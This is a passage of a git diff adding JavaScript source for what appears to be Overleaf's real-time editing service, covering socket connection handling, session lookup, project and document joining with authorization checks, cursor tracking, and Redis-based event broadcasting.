} + + // The client.id is security sensitive. Generate a publicId for sending to other clients. + client.publicId = 'P.' + base64id.generateId() + + client.remoteIp = websocketAddressManager.getRemoteIp(client.handshake) + const headers = client.handshake && client.handshake.headers + client.userAgent = headers && headers['user-agent'] + + metrics.inc('socket-io.connection', 1, { + status: client.transport, + method: 'auto-join-project', + }) + metrics.gauge('socket-io.clients', io.sockets.clients().length) + + let user + if (session && session.passport && session.passport.user) { + ;({ user } = session.passport) + } else if (session && session.user) { + ;({ user } = session) + } else { + const anonymousAccessToken = session?.anonTokenAccess?.[projectId] + user = { _id: 'anonymous-user', anonymousAccessToken } + } + + const info = { + userId: user._id, + projectId, + transport: client.transport, + publicId: client.publicId, + clientId: client.id, + isDebugging, + } + if (isDebugging) { + logger.info(info, 'client connected') + } else { + logger.debug(info, 'client connected') + } + + const connectionDetails = { + userId: user._id, + projectId, + remoteIp: client.remoteIp, + publicId: client.publicId, + clientId: client.id, + } + + let pingTimestamp + let pingId = -1 + let pongId = -1 + const pingTimer = useServerPing + ? 
setInterval(function () { + if (pongId !== pingId) { + logger.warn( + { + ...connectionDetails, + pingId, + pongId, + lastPingTimestamp: pingTimestamp, + }, + 'no client response to last ping' + ) + } + pingTimestamp = Date.now() + client.emit( + 'serverPing', + ++pingId, + pingTimestamp, + client.transport, + client.id + ) + }, SERVER_PING_INTERVAL) + : null + client.on( + 'clientPong', + function ( + receivedPingId, + sentTimestamp, + serverTransport, + serverSessionId, + clientTransport, + clientSessionId + ) { + pongId = receivedPingId + const receivedTimestamp = Date.now() + if ( + receivedPingId !== pingId || + (serverSessionId && serverSessionId !== clientSessionId) + ) { + logger.warn( + { + ...connectionDetails, + receivedPingId, + pingId, + sentTimestamp, + receivedTimestamp, + latency: receivedTimestamp - sentTimestamp, + lastPingTimestamp: pingTimestamp, + serverTransport, + serverSessionId, + clientTransport, + clientSessionId, + }, + 'received pong with wrong counter' + ) + } else if ( + receivedTimestamp - sentTimestamp > + SERVER_PING_LATENCY_THRESHOLD + ) { + logger.warn( + { + ...connectionDetails, + receivedPingId, + pingId, + sentTimestamp, + receivedTimestamp, + latency: receivedTimestamp - sentTimestamp, + lastPingTimestamp: pingTimestamp, + }, + 'received pong with high latency' + ) + } + } + ) + + if (settings.exposeHostname) { + client.on('debug.getHostname', function (callback) { + if (typeof callback !== 'function') { + return Router._handleInvalidArguments( + client, + 'debug.getHostname', + arguments + ) + } + callback(HOSTNAME) + }) + } + client.on('debug', (data, callback) => { + if (typeof callback !== 'function') { + return Router._handleInvalidArguments(client, 'debug', arguments) + } + + logger.info( + { publicId: client.publicId, clientId: client.id }, + 'received debug message' + ) + + const response = { + serverTime: Date.now(), + data, + client: { + publicId: client.publicId, + remoteIp: client.remoteIp, + userAgent: client.userAgent, + connected: !client.disconnected, + connectedAt: client.connectedAt, + }, + server: { + hostname: settings.exposeHostname ? HOSTNAME : undefined, + }, + } + + callback(response) + }) + const joinProject = function (callback) { + WebsocketController.joinProject( + client, + user, + projectId, + function (err, ...args) { + if (err) { + Router._handleError(callback, err, client, 'joinProject', { + project_id: projectId, + user_id: user._id, + }) + } else { + callback(null, ...args) + } + } + ) + } + + client.on('disconnect', function () { + metrics.inc('socket-io.disconnect', 1, { status: client.transport }) + metrics.gauge('socket-io.clients', io.sockets.clients().length) + + if (client.isDebugging) { + const duration = Date.now() - client.connectedAt + metrics.timing('socket-io.debugging.duration', duration) + logger.info( + { duration, publicId: client.publicId, clientId: client.id }, + 'debug client disconnected' + ) + } else { + clearInterval(pingTimer) + } + + WebsocketController.leaveProject(io, client, function (err) { + if (err) { + Router._handleError(function () {}, err, client, 'leaveProject') + } + }) + }) + + // Variadic. 
The possible arguments:
+      //   doc_id, callback
+      //   doc_id, fromVersion, callback
+      //   doc_id, options, callback
+      //   doc_id, fromVersion, options, callback
+      client.on('joinDoc', function (docId, fromVersion, options, callback) {
+        if (typeof fromVersion === 'function' && !options) {
+          callback = fromVersion
+          fromVersion = -1
+          options = {}
+        } else if (
+          typeof fromVersion === 'number' &&
+          typeof options === 'function'
+        ) {
+          callback = options
+          options = {}
+        } else if (
+          typeof fromVersion === 'object' &&
+          typeof options === 'function'
+        ) {
+          callback = options
+          options = fromVersion
+          fromVersion = -1
+        } else if (
+          typeof fromVersion === 'number' &&
+          typeof options === 'object' &&
+          typeof callback === 'function'
+        ) {
+          // Called with 4 args, things are as expected
+        } else {
+          return Router._handleInvalidArguments(client, 'joinDoc', arguments)
+        }
+        try {
+          Joi.assert(
+            { doc_id: docId, fromVersion, options },
+            Joi.object({
+              doc_id: JOI_OBJECT_ID,
+              fromVersion: Joi.number().integer(),
+              options: Joi.object().required(),
+            })
+          )
+        } catch (error) {
+          return Router._handleError(callback, error, client, 'joinDoc', {
+            disconnect: 1,
+          })
+        }
+        WebsocketController.joinDoc(
+          client,
+          docId,
+          fromVersion,
+          options,
+          function (err, ...args) {
+            if (err) {
+              Router._handleError(callback, err, client, 'joinDoc', {
+                doc_id: docId,
+                fromVersion,
+              })
+            } else {
+              callback(null, ...args)
+            }
+          }
+        )
+      })
+
+      client.on('leaveDoc', function (docId, callback) {
+        if (typeof callback !== 'function') {
+          return Router._handleInvalidArguments(client, 'leaveDoc', arguments)
+        }
+        try {
+          Joi.assert(docId, JOI_OBJECT_ID)
+        } catch (error) {
+          return Router._handleError(callback, error, client, 'leaveDoc', {
+            disconnect: 1,
+          })
+        }
+        WebsocketController.leaveDoc(client, docId, function (err, ...args) {
+          if (err) {
+            Router._handleError(callback, err, client, 'leaveDoc', {
+              doc_id: docId,
+            })
+          } else {
+            callback(null, ...args)
+          }
+        })
+      })
+
+      client.on('clientTracking.getConnectedUsers', function (callback) {
+        if (typeof callback !== 'function') {
+          return Router._handleInvalidArguments(
+            client,
+            'clientTracking.getConnectedUsers',
+            arguments
+          )
+        }
+
+        WebsocketController.getConnectedUsers(client, function (err, users) {
+          if (err) {
+            Router._handleError(
+              callback,
+              err,
+              client,
+              'clientTracking.getConnectedUsers'
+            )
+          } else {
+            callback(null, users)
+          }
+        })
+      })
+
+      client.on(
+        'clientTracking.updatePosition',
+        function (cursorData, callback) {
+          if (!callback) {
+            callback = function () {
+              // NOTE: The frontend does not pass any callback to socket.io.
+              // Any error is already logged via Router._handleError.
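+              // Installing this no-op keeps the error path below simple:
+              // `callback` can always be invoked without an extra guard.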
+ } + } + if (typeof callback !== 'function') { + return Router._handleInvalidArguments( + client, + 'clientTracking.updatePosition', + arguments + ) + } + + WebsocketController.updateClientPosition( + client, + cursorData, + function (err) { + if (err) { + Router._handleError( + callback, + err, + client, + 'clientTracking.updatePosition' + ) + } else { + callback() + } + } + ) + } + ) + + client.on('applyOtUpdate', function (docId, update, callback) { + if (typeof callback !== 'function') { + return Router._handleInvalidArguments( + client, + 'applyOtUpdate', + arguments + ) + } + try { + Joi.assert( + { doc_id: docId, update }, + Joi.object({ + doc_id: JOI_OBJECT_ID, + update: Joi.object().required(), + }) + ) + } catch (error) { + return Router._handleError(callback, error, client, 'applyOtUpdate', { + disconnect: 1, + }) + } + WebsocketController.applyOtUpdate( + client, + docId, + update, + function (err) { + if (err) { + Router._handleError(callback, err, client, 'applyOtUpdate', { + doc_id: docId, + }) + } else { + callback() + } + } + ) + }) + + if (!isDebugging) { + joinProject((err, project, permissionsLevel, protocolVersion) => { + if (err) { + client.emit('connectionRejected', err) + client.disconnect() + return + } + client.emit('joinProjectResponse', { + publicId: client.publicId, + project, + permissionsLevel, + protocolVersion, + }) + }) + } + }) + }, +} diff --git a/services/real-time/app/js/SafeJsonParse.js b/services/real-time/app/js/SafeJsonParse.js new file mode 100644 index 0000000..bc7a6be --- /dev/null +++ b/services/real-time/app/js/SafeJsonParse.js @@ -0,0 +1,17 @@ +const Settings = require('@overleaf/settings') +const { DataTooLargeToParseError } = require('./Errors') + +module.exports = { + parse(data, callback) { + if (data.length > Settings.maxUpdateSize) { + return callback(new DataTooLargeToParseError(data)) + } + let parsed + try { + parsed = JSON.parse(data) + } catch (e) { + return callback(e) + } + callback(null, parsed) + }, +} diff --git a/services/real-time/app/js/SessionSockets.js b/services/real-time/app/js/SessionSockets.js new file mode 100644 index 0000000..c454ccb --- /dev/null +++ b/services/real-time/app/js/SessionSockets.js @@ -0,0 +1,45 @@ +const metrics = require('@overleaf/metrics') +const OError = require('@overleaf/o-error') +const { EventEmitter } = require('node:events') +const { MissingSessionError } = require('./Errors') + +module.exports = function (io, sessionStore, cookieParser, cookieName) { + const missingSessionError = new MissingSessionError() + + const sessionSockets = new EventEmitter() + function next(error, socket, session) { + sessionSockets.emit('connection', error, socket, session) + } + + io.on('connection', function (socket) { + const req = socket.handshake + cookieParser(req, {}, function () { + const sessionId = req.signedCookies && req.signedCookies[cookieName] + if (!sessionId) { + metrics.inc('session.cookie', 1, { + // the cookie-parser middleware sets the signed cookie to false if the + // signature is invalid, so we can use this to detect bad signatures + status: sessionId === false ? 
'bad-signature' : 'none', + }) + return next(missingSessionError, socket) + } + sessionStore.get(sessionId, function (error, session) { + if (error) { + metrics.inc('session.cookie', 1, { status: 'error' }) + OError.tag(error, 'error getting session from sessionStore', { + sessionId, + }) + return next(error, socket) + } + if (!session) { + metrics.inc('session.cookie', 1, { status: 'missing' }) + return next(missingSessionError, socket) + } + metrics.inc('session.cookie', 1, { status: 'signed' }) + next(null, socket, session) + }) + }) + }) + + return sessionSockets +} diff --git a/services/real-time/app/js/WebApiManager.js b/services/real-time/app/js/WebApiManager.js new file mode 100644 index 0000000..efc7092 --- /dev/null +++ b/services/real-time/app/js/WebApiManager.js @@ -0,0 +1,63 @@ +const request = require('request') +const OError = require('@overleaf/o-error') +const settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const { + CodedError, + CorruptedJoinProjectResponseError, + NotAuthorizedError, + WebApiRequestFailedError, +} = require('./Errors') + +module.exports = { + joinProject(projectId, user, callback) { + const userId = user._id + logger.debug({ projectId, userId }, 'sending join project request to web') + const url = `${settings.apis.web.url}/project/${projectId}/join` + request.post( + { + url, + auth: { + user: settings.apis.web.user, + pass: settings.apis.web.pass, + sendImmediately: true, + }, + json: { + userId, + anonymousAccessToken: user.anonymousAccessToken, + }, + jar: false, + }, + function (error, response, data) { + if (error) { + OError.tag(error, 'join project request failed') + return callback(error) + } + if (response.statusCode >= 200 && response.statusCode < 300) { + if (!(data && data.project)) { + return callback(new CorruptedJoinProjectResponseError()) + } + const userMetadata = { + isRestrictedUser: data.isRestrictedUser, + isTokenMember: data.isTokenMember, + isInvitedMember: data.isInvitedMember, + } + callback(null, data.project, data.privilegeLevel, userMetadata) + } else if (response.statusCode === 429) { + callback( + new CodedError( + 'rate-limit hit when joining project', + 'TooManyRequests' + ) + ) + } else if (response.statusCode === 403) { + callback(new NotAuthorizedError()) + } else if (response.statusCode === 404) { + callback(new CodedError('project not found', 'ProjectNotFound')) + } else { + callback(new WebApiRequestFailedError(response.statusCode)) + } + } + ) + }, +} diff --git a/services/real-time/app/js/WebsocketAddressManager.js b/services/real-time/app/js/WebsocketAddressManager.js new file mode 100644 index 0000000..d01f081 --- /dev/null +++ b/services/real-time/app/js/WebsocketAddressManager.js @@ -0,0 +1,39 @@ +const proxyaddr = require('proxy-addr') + +module.exports = class WebsocketAddressManager { + constructor(behindProxy, trustedProxyIps) { + if (behindProxy) { + // parse trustedProxyIps comma-separated list the same way as express + this.trust = proxyaddr.compile( + trustedProxyIps ? 
trustedProxyIps.split(/ *, */) : [] + ) + } + } + + getRemoteIp(clientHandshake) { + if (!clientHandshake) { + return 'client-handshake-missing' + } else if (this.trust) { + // create a dummy req object using the client handshake and + // connection.remoteAddress for the proxy-addr module to parse + try { + const addressPort = clientHandshake.address + const req = { + headers: { + 'x-forwarded-for': + clientHandshake.headers && + clientHandshake.headers['x-forwarded-for'], + }, + connection: { remoteAddress: addressPort && addressPort.address }, + } + // return the address parsed from x-forwarded-for + return proxyaddr(req, this.trust) + } catch (err) { + return 'client-handshake-invalid' + } + } else { + // return the address from the client handshake itself + return clientHandshake.address && clientHandshake.address.address + } + } +} diff --git a/services/real-time/app/js/WebsocketController.js b/services/real-time/app/js/WebsocketController.js new file mode 100644 index 0000000..dec5677 --- /dev/null +++ b/services/real-time/app/js/WebsocketController.js @@ -0,0 +1,657 @@ +const OError = require('@overleaf/o-error') +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') +const WebApiManager = require('./WebApiManager') +const AuthorizationManager = require('./AuthorizationManager') +const DocumentUpdaterManager = require('./DocumentUpdaterManager') +const ConnectedUsersManager = require('./ConnectedUsersManager') +const WebsocketLoadBalancer = require('./WebsocketLoadBalancer') +const RoomManager = require('./RoomManager') +const { + JoinLeaveEpochMismatchError, + NotAuthorizedError, + NotJoinedError, + ClientRequestedMissingOpsError, +} = require('./Errors') + +const JOIN_DOC_CATCH_UP_LENGTH_BUCKETS = [ + 0, 5, 10, 25, 50, 100, 150, 200, 250, 500, 1000, +] +const JOIN_DOC_CATCH_UP_AGE = [ + 0, + 1, + 2, + 5, + 10, + 20, + 30, + 60, + 120, + 240, + 600, + 60 * 60, + 24 * 60 * 60, +].map(x => x * 1000) + +let WebsocketController +module.exports = WebsocketController = { + // If the protocol version changes when the client reconnects, + // it will force a full refresh of the page. Useful for non-backwards + // compatible protocol changes. Use only in extreme need. 
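+  //
+  // For example, bumping PROTOCOL_VERSION from 2 to 3 would make every
+  // client that reconnects reload the editor page in full rather than
+  // resume its session.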
+ PROTOCOL_VERSION: 2, + + joinProject(client, user, projectId, callback) { + if (client.disconnected) { + metrics.inc('editor.join-project.disconnected', 1, { + status: 'immediately', + }) + return callback() + } + + const userId = user._id + logger.info( + { + userId, + projectId, + clientId: client.id, + remoteIp: client.remoteIp, + userAgent: client.userAgent, + }, + 'user joining project' + ) + metrics.inc('editor.join-project', 1, { status: client.transport }) + WebApiManager.joinProject( + projectId, + user, + function (error, project, privilegeLevel, userMetadata) { + if (error) { + return callback(error) + } + if (client.disconnected) { + logger.info( + { userId, projectId, clientId: client.id }, + 'client disconnected before joining project' + ) + metrics.inc('editor.join-project.disconnected', 1, { + status: 'after-web-api-call', + }) + return callback() + } + + if (!privilegeLevel) { + return callback(new NotAuthorizedError()) + } + + client.ol_context = {} + client.ol_context.privilege_level = privilegeLevel + client.ol_context.user_id = userId + client.ol_context.project_id = projectId + client.ol_context.owner_id = project.owner && project.owner._id + client.ol_context.first_name = user.first_name + client.ol_context.last_name = user.last_name + client.ol_context.email = user.email + client.ol_context.connected_time = new Date() + client.ol_context.signup_date = user.signUpDate + client.ol_context.login_count = user.loginCount + client.ol_context.is_restricted_user = !!userMetadata.isRestrictedUser + client.ol_context.is_token_member = !!userMetadata.isTokenMember + client.ol_context.is_invited_member = !!userMetadata.isInvitedMember + + RoomManager.joinProject(client, projectId, function (err) { + if (err) { + return callback(err) + } + logger.debug( + { + userId, + projectId, + clientId: client.id, + privilegeLevel, + userMetadata, + }, + 'user joined project' + ) + callback( + null, + project, + privilegeLevel, + WebsocketController.PROTOCOL_VERSION + ) + }) + + // No need to block for setting the user as connected in the cursor tracking + ConnectedUsersManager.updateUserPosition( + projectId, + client.publicId, + user, + null, + function (err) { + if (err) { + logger.warn( + { err, projectId, userId, clientId: client.id }, + 'background cursor update failed' + ) + } + } + ) + } + ) + }, + + // We want to flush a project if there are no more (local) connected clients + // but we need to wait for the triggering client to disconnect. How long we wait + // is determined by FLUSH_IF_EMPTY_DELAY. 
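+  //
+  // Timeline sketch: the last client disconnects at t=0; at t=500ms we
+  // re-check io.sockets.clients(projectId) and only flush the project if
+  // no other client has (re)joined in the meantime.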
+ FLUSH_IF_EMPTY_DELAY: 500, // ms + leaveProject(io, client, callback) { + const { project_id: projectId, user_id: userId } = client.ol_context + if (!projectId) { + return callback() + } // client did not join project + + metrics.inc('editor.leave-project', 1, { status: client.transport }) + logger.info( + { projectId, userId, clientId: client.id }, + 'client leaving project' + ) + WebsocketLoadBalancer.emitToRoom( + projectId, + 'clientTracking.clientDisconnected', + client.publicId + ) + + // We can do this in the background + ConnectedUsersManager.markUserAsDisconnected( + projectId, + client.publicId, + function (err) { + if (err) { + logger.error( + { err, projectId, userId, clientId: client.id }, + 'error marking client as disconnected' + ) + } + } + ) + + RoomManager.leaveProjectAndDocs(client) + setTimeout(function () { + const remainingClients = io.sockets.clients(projectId) + if (remainingClients.length === 0) { + // Flush project in the background + DocumentUpdaterManager.flushProjectToMongoAndDelete( + projectId, + function (err) { + if (err) { + logger.error( + { err, projectId, userId, clientId: client.id }, + 'error flushing to doc updater after leaving project' + ) + } + } + ) + } + callback() + }, WebsocketController.FLUSH_IF_EMPTY_DELAY) + }, + + joinDoc(client, docId, fromVersion, options, callback) { + if (client.disconnected) { + metrics.inc('editor.join-doc.disconnected', 1, { status: 'immediately' }) + return callback() + } + + const joinLeaveEpoch = ++client.joinLeaveEpoch + metrics.inc('editor.join-doc', 1, { status: client.transport }) + const { + project_id: projectId, + user_id: userId, + is_restricted_user: isRestrictedUser, + } = client.ol_context + if (!projectId) { + return callback(new NotJoinedError()) + } + logger.debug( + { userId, projectId, docId, fromVersion, clientId: client.id }, + 'client joining doc' + ) + + const emitJoinDocCatchUpMetrics = ( + status, + { firstVersionInRedis, version, ttlInS } + ) => { + if (fromVersion === -1) return // full joinDoc call + if (typeof options.age !== 'number') return // old frontend + if (!ttlInS) return // old document-updater pod + + const isStale = options.age > ttlInS * 1000 + const method = isStale ? 'stale' : 'recent' + metrics.histogram( + 'join-doc-catch-up-length', + version - fromVersion, + JOIN_DOC_CATCH_UP_LENGTH_BUCKETS, + { status, method, path: client.transport } + ) + if (firstVersionInRedis) { + metrics.histogram( + 'join-doc-catch-up-length-extra-needed', + firstVersionInRedis - fromVersion, + JOIN_DOC_CATCH_UP_LENGTH_BUCKETS, + { status, method, path: client.transport } + ) + } + metrics.histogram( + 'join-doc-catch-up-age', + options.age, + JOIN_DOC_CATCH_UP_AGE, + { status, path: client.transport } + ) + } + + WebsocketController._assertClientAuthorization( + client, + docId, + function (error) { + if (error) { + return callback(error) + } + if (client.disconnected) { + metrics.inc('editor.join-doc.disconnected', 1, { + status: 'after-client-auth-check', + }) + // the client will not read the response anyways + return callback() + } + if (joinLeaveEpoch !== client.joinLeaveEpoch) { + // another joinDoc or leaveDoc rpc overtook us + return callback(new JoinLeaveEpochMismatchError()) + } + // ensure the per-doc applied-ops channel is subscribed before sending the + // doc to the client, so that no events are missed. 
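+        // (Subscribing first avoids a race: an op applied after getDocument
+        // returned but before a later subscribe completed would never reach
+        // this client, leaving it permanently behind on the doc version.)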
+ RoomManager.joinDoc(client, docId, function (error) { + if (error) { + return callback(error) + } + if (client.disconnected) { + metrics.inc('editor.join-doc.disconnected', 1, { + status: 'after-joining-room', + }) + // the client will not read the response anyways + return callback() + } + + DocumentUpdaterManager.getDocument( + projectId, + docId, + fromVersion, + function (error, lines, version, ranges, ops, ttlInS) { + if (error) { + if (error instanceof ClientRequestedMissingOpsError) { + emitJoinDocCatchUpMetrics('missing', error.info) + } + return callback(error) + } + emitJoinDocCatchUpMetrics('success', { version, ttlInS }) + if (client.disconnected) { + metrics.inc('editor.join-doc.disconnected', 1, { + status: 'after-doc-updater-call', + }) + // the client will not read the response anyways + return callback() + } + + if (isRestrictedUser && ranges && ranges.comments) { + ranges.comments = [] + } + + // Encode any binary bits of data so it can go via WebSockets + // See http://ecmanaut.blogspot.co.uk/2006/07/encoding-decoding-utf8-in-javascript.html + const encodeForWebsockets = text => + unescape(encodeURIComponent(text)) + const escapedLines = [] + for (let line of lines) { + try { + line = encodeForWebsockets(line) + } catch (err) { + OError.tag(err, 'error encoding line uri component', { line }) + return callback(err) + } + escapedLines.push(line) + } + if (options.encodeRanges) { + try { + for (const comment of (ranges && ranges.comments) || []) { + if (comment.op.c) { + comment.op.c = encodeForWebsockets(comment.op.c) + } + } + for (const change of (ranges && ranges.changes) || []) { + if (change.op.i) { + change.op.i = encodeForWebsockets(change.op.i) + } + if (change.op.d) { + change.op.d = encodeForWebsockets(change.op.d) + } + } + } catch (err) { + OError.tag(err, 'error encoding range uri component', { + ranges, + }) + return callback(err) + } + } + + AuthorizationManager.addAccessToDoc(client, docId, () => {}) + logger.debug( + { + userId, + projectId, + docId, + fromVersion, + clientId: client.id, + }, + 'client joined doc' + ) + callback(null, escapedLines, version, ops, ranges) + } + ) + }) + } + ) + }, + + _assertClientAuthorization(client, docId, callback) { + // Check for project-level access first + AuthorizationManager.assertClientCanViewProject(client, function (error) { + if (error) { + return callback(error) + } + // Check for doc-level access next + AuthorizationManager.assertClientCanViewProjectAndDoc( + client, + docId, + function (error) { + if (error) { + // No cached access, check docupdater + const { project_id: projectId } = client.ol_context + DocumentUpdaterManager.checkDocument( + projectId, + docId, + function (error) { + if (error) { + return callback(error) + } else { + // Success + AuthorizationManager.addAccessToDoc(client, docId, callback) + } + } + ) + } else { + // Access already cached + callback() + } + } + ) + }) + }, + + leaveDoc(client, docId, callback) { + // client may have disconnected, but we have to cleanup internal state. + client.joinLeaveEpoch++ + metrics.inc('editor.leave-doc', 1, { status: client.transport }) + const { project_id: projectId, user_id: userId } = client.ol_context + logger.debug( + { userId, projectId, docId, clientId: client.id }, + 'client leaving doc' + ) + RoomManager.leaveDoc(client, docId) + // we could remove permission when user leaves a doc, but because + // the connection is per-project, we continue to allow access + // after the initial joinDoc since we know they are already authorised. 
+ // # AuthorizationManager.removeAccessToDoc client, doc_id + callback() + }, + updateClientPosition(client, cursorData, callback) { + if (client.disconnected) { + // do not create a ghost entry in redis + return callback() + } + + metrics.inc('editor.update-client-position', 0.1, { + status: client.transport, + }) + const { + project_id: projectId, + first_name: firstName, + last_name: lastName, + email, + user_id: userId, + } = client.ol_context + logger.debug( + { userId, projectId, clientId: client.id, cursorData }, + 'updating client position' + ) + + AuthorizationManager.assertClientCanViewProjectAndDoc( + client, + cursorData.doc_id, + function (error) { + if (error) { + logger.debug( + { err: error, clientId: client.id, projectId, userId }, + "silently ignoring unauthorized updateClientPosition. Client likely hasn't called joinProject yet." + ) + return callback() + } + cursorData.id = client.publicId + if (userId) { + cursorData.user_id = userId + } + if (email) { + cursorData.email = email + } + // Don't store anonymous users in redis to avoid influx + if (!userId || userId === 'anonymous-user') { + cursorData.name = '' + // consistent async behaviour + setTimeout(callback) + } else { + cursorData.name = + firstName && lastName + ? `${firstName} ${lastName}` + : firstName || lastName || '' + ConnectedUsersManager.updateUserPosition( + projectId, + client.publicId, + { + first_name: firstName, + last_name: lastName, + email, + _id: userId, + }, + { + row: cursorData.row, + column: cursorData.column, + doc_id: cursorData.doc_id, + }, + callback + ) + } + WebsocketLoadBalancer.emitToRoom( + projectId, + 'clientTracking.clientUpdated', + cursorData + ) + } + ) + }, + + CLIENT_REFRESH_DELAY: 1000, + getConnectedUsers(client, callback) { + if (client.disconnected) { + // they are not interested anymore, skip the redis lookups + return callback() + } + + metrics.inc('editor.get-connected-users', { status: client.transport }) + const { + project_id: projectId, + user_id: userId, + is_restricted_user: isRestrictedUser, + } = client.ol_context + if (isRestrictedUser) { + return callback(null, []) + } + if (!projectId) { + return callback(new NotJoinedError()) + } + logger.debug( + { userId, projectId, clientId: client.id }, + 'getting connected users' + ) + AuthorizationManager.assertClientCanViewProject(client, function (error) { + if (error) { + return callback(error) + } + WebsocketLoadBalancer.emitToRoom(projectId, 'clientTracking.refresh') + setTimeout( + () => + ConnectedUsersManager.getConnectedUsers( + projectId, + function (error, users) { + if (error) { + return callback(error) + } + logger.debug( + { userId, projectId, clientId: client.id }, + 'got connected users' + ) + callback(null, users) + } + ), + WebsocketController.CLIENT_REFRESH_DELAY + ) + }) + }, + + applyOtUpdate(client, docId, update, callback) { + // client may have disconnected, but we can submit their update to doc-updater anyways. 
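+    // The update is stamped below with meta.source (the sender's publicId),
+    // meta.user_id and meta.tsRT (real-time ingestion timestamp) before
+    // being queued; DocumentUpdaterController later uses meta.source to
+    // acknowledge the sender and meta.tsRT to measure processing latency.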
+ const { user_id: userId, project_id: projectId } = client.ol_context + if (!projectId) { + return callback(new NotJoinedError()) + } + + WebsocketController._assertClientCanApplyUpdate( + client, + docId, + update, + function (error) { + if (error) { + setTimeout( + () => + // Disconnect, but give the client the chance to receive the error + client.disconnect(), + 100 + ) + return callback(error) + } + if (!update.meta) { + update.meta = {} + } + update.meta.source = client.publicId + update.meta.user_id = userId + update.meta.tsRT = performance.now() + metrics.inc('editor.doc-update', 0.3, { status: client.transport }) + + logger.debug( + { + userId, + docId, + projectId, + clientId: client.id, + version: update.v, + }, + 'sending update to doc updater' + ) + + DocumentUpdaterManager.queueChange( + projectId, + docId, + update, + function (error) { + if ((error && error.message) === 'update is too large') { + metrics.inc('update_too_large') + const { updateSize } = error.info + logger.warn( + { userId, projectId, docId, updateSize }, + 'update is too large' + ) + + // mark the update as received -- the client should not send it again! + callback() + + // trigger an out-of-sync error + const message = { + project_id: projectId, + doc_id: docId, + error: 'update is too large', + } + setTimeout(function () { + if (client.disconnected) { + // skip the message broadcast, the client has moved on + return metrics.inc('editor.doc-update.disconnected', 1, { + status: 'at-otUpdateError', + }) + } + client.emit('otUpdateError', message.error, message) + client.disconnect() + }, 100) + return + } + + if (error) { + OError.tag(error, 'document was not available for update', { + version: update.v, + }) + client.disconnect() + } + callback(error) + } + ) + } + ) + }, + + _assertClientCanApplyUpdate(client, docId, update, callback) { + if (WebsocketController._isCommentUpdate(update)) { + return AuthorizationManager.assertClientCanViewProjectAndDoc( + client, + docId, + callback + ) + } else if (update.meta?.tc) { + return AuthorizationManager.assertClientCanReviewProjectAndDoc( + client, + docId, + callback + ) + } else { + return AuthorizationManager.assertClientCanEditProjectAndDoc( + client, + docId, + callback + ) + } + }, + + _isCommentUpdate(update) { + if (!(update && update.op instanceof Array)) { + return false + } + for (const op of update.op) { + if (!op.c) { + return false + } + } + return true + }, +} diff --git a/services/real-time/app/js/WebsocketLoadBalancer.js b/services/real-time/app/js/WebsocketLoadBalancer.js new file mode 100644 index 0000000..ebf20fa --- /dev/null +++ b/services/real-time/app/js/WebsocketLoadBalancer.js @@ -0,0 +1,251 @@ +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const Metrics = require('@overleaf/metrics') +const RedisClientManager = require('./RedisClientManager') +const SafeJsonParse = require('./SafeJsonParse') +const EventLogger = require('./EventLogger') +const HealthCheckManager = require('./HealthCheckManager') +const RoomManager = require('./RoomManager') +const ChannelManager = require('./ChannelManager') +const ConnectedUsersManager = require('./ConnectedUsersManager') + +const RESTRICTED_USER_MESSAGE_TYPE_PASS_LIST = [ + 'otUpdateApplied', + 'otUpdateError', + 'joinDoc', + 'reciveNewDoc', + 'reciveNewFile', + 'reciveNewFolder', + 'reciveEntityMove', + 'reciveEntityRename', + 'removeEntity', + 'accept-changes', + 'projectNameUpdated', + 'rootDocUpdated', + 'toggle-track-changes', + 
'projectRenamedOrDeletedByExternalSource', +] +const BANDWIDTH_BUCKETS = [0] +// 64 bytes ... 8MB +for (let i = 5; i <= 22; i++) { + BANDWIDTH_BUCKETS.push(2 << i) +} + +let WebsocketLoadBalancer +module.exports = WebsocketLoadBalancer = { + rclientPubList: RedisClientManager.createClientList(Settings.redis.pubsub), + rclientSubList: RedisClientManager.createClientList(Settings.redis.pubsub), + + shouldDisconnectClient(client, message) { + const userId = client.ol_context.user_id + if (message?.message === 'userRemovedFromProject') { + if (message?.payload?.includes(userId)) { + return true + } + } else if (message?.message === 'project:publicAccessLevel:changed') { + const [info] = message.payload + if ( + info.newAccessLevel === 'private' && + !client.ol_context.is_invited_member + ) { + return true + } + } else if (message?.message === 'project:collaboratorAccessLevel:changed') { + const changedUserId = message.payload[0].userId + return userId === changedUserId + } + return false + }, + + emitToRoom(roomId, message, ...payload) { + if (!roomId) { + logger.warn( + { message, payload }, + 'no room_id provided, ignoring emitToRoom' + ) + return + } + const data = JSON.stringify({ + room_id: roomId, + message, + payload, + }) + logger.debug( + { roomId, message, payload, length: data.length }, + 'emitting to room' + ) + + this.rclientPubList.map(rclientPub => + ChannelManager.publish(rclientPub, 'editor-events', roomId, data) + ) + }, + + emitToAll(message, ...payload) { + this.emitToRoom('all', message, ...payload) + }, + + listenForEditorEvents(io) { + logger.debug( + { rclients: this.rclientSubList.length }, + 'listening for editor events' + ) + for (const rclientSub of this.rclientSubList) { + rclientSub.subscribe('editor-events') + rclientSub.on('message', function (channel, message) { + if (Settings.debugEvents > 0) { + EventLogger.debugEvent(channel, message) + } + WebsocketLoadBalancer._processEditorEvent(io, channel, message) + }) + } + this.handleRoomUpdates(this.rclientSubList) + }, + + handleRoomUpdates(rclientSubList) { + const roomEvents = RoomManager.eventSource() + roomEvents.on('project-active', function (projectId) { + const subscribePromises = rclientSubList.map(rclient => + ChannelManager.subscribe(rclient, 'editor-events', projectId) + ) + RoomManager.emitOnCompletion( + subscribePromises, + `project-subscribed-${projectId}` + ) + }) + roomEvents.on('project-empty', projectId => + rclientSubList.map(rclient => + ChannelManager.unsubscribe(rclient, 'editor-events', projectId) + ) + ) + }, + + _processEditorEvent(io, channel, message) { + SafeJsonParse.parse(message, function (error, message) { + if (error) { + logger.error({ err: error, channel }, 'error parsing JSON') + return + } + if (message.room_id === 'all') { + io.sockets.emit(message.message, ...message.payload) + } else if ( + message.message === 'clientTracking.refresh' && + message.room_id + ) { + const clientList = io.sockets.clients(message.room_id) + logger.debug( + { + channel, + message: message.message, + roomId: message.room_id, + messageId: message._id, + socketIoClients: clientList.map(client => client.id), + }, + 'refreshing client list' + ) + for (const client of clientList) { + ConnectedUsersManager.refreshClient(message.room_id, client.publicId) + } + } else if (message.message === 'canary-applied-op') { + const { ack, broadcast, source, projectId, docId } = message.payload + + const estimateBandwidth = (room, path) => { + const seen = new Set() + for (const client of 